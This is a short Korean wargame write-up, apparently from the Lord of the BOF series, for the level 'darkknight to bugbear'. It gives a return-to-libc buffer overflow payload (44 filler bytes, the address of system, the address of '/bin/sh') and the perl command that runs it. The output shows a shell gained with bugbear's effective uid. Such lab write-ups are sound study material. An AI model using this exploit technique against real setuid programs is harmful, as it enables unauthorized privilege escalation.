darkknight to bugbear

소스를 보면 처음에 주석에 친절히 RTL이라 적혀잇고,

문제에서 ret의 시작주소가 bf가 되면 안된다.

 

그러므로 ret2libc공격을 사용해서 쉽게 공략 하겟다.

 

 

[payload]

["x"*44][&system]["aaaa"][&"/bin/sh"]

 

 

 

공격

 

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "x"x44,"\xe0\x8a\x05\x40","aaaa","\xf9\xbf\x0f\x40";'`

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?@aaaa廈@

bash$ id

uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)

bash$ my-pass

euid = 513

new divide